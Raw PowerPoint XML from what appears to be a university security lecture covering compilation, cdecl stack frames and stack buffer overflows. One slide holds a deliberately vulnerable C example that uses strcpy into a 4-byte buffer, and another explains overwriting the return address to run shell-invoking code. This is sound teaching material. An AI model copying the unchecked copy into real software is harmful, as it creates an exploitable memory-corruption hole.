            <a:off x="2826432" y="84979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0xfd2cc</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34253762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119</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0x80483c5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52526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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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47592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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The assembler turns the assembly into a binary object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The assembler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A binary object contains the binary code and additional metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocation information about things that need to be fixed once the code and the data are loaded into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information about the symbols defined by the object file and the symbols that are imported from different objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugging information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="520537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0xfd2c0</a:t>
                      </a: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120</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0x80483c5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52526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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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12969614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0xfd2c0</a:t>
                      </a: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121</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0x80483c5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52526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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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167701248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0xfd2c0</a:t>
                      </a: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122</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0x80483c5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52526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27714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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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20811810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0xfd2c0</a:t>
                      </a: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123</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0x33</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atin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c6</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552699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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="27714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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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202115072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42" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436243" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is copied without checking boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data "overflows" a pre-allocated buffer and overwrites the return address (or other parts of the frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally this causes a segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly crafted, it is possible overwrite the return address with a user-defined value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to cause a jump to user-defined code (e.g., code that invokes a shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code may be part of the overflowing data (or not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code will be executed with the privileges of the running program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="851709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6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6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62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624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624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36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 of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved EBP and saved EIP are stored on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What prevents a program/function from writing/changing those values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would happen if they did?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1058764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954" y="305134"/>
            <a:ext cx="4229810" cy="5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</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char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="29782"/>
            <a:ext cx="5832763" cy="666795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900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x28,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x8(</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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  lea -0xc(</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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
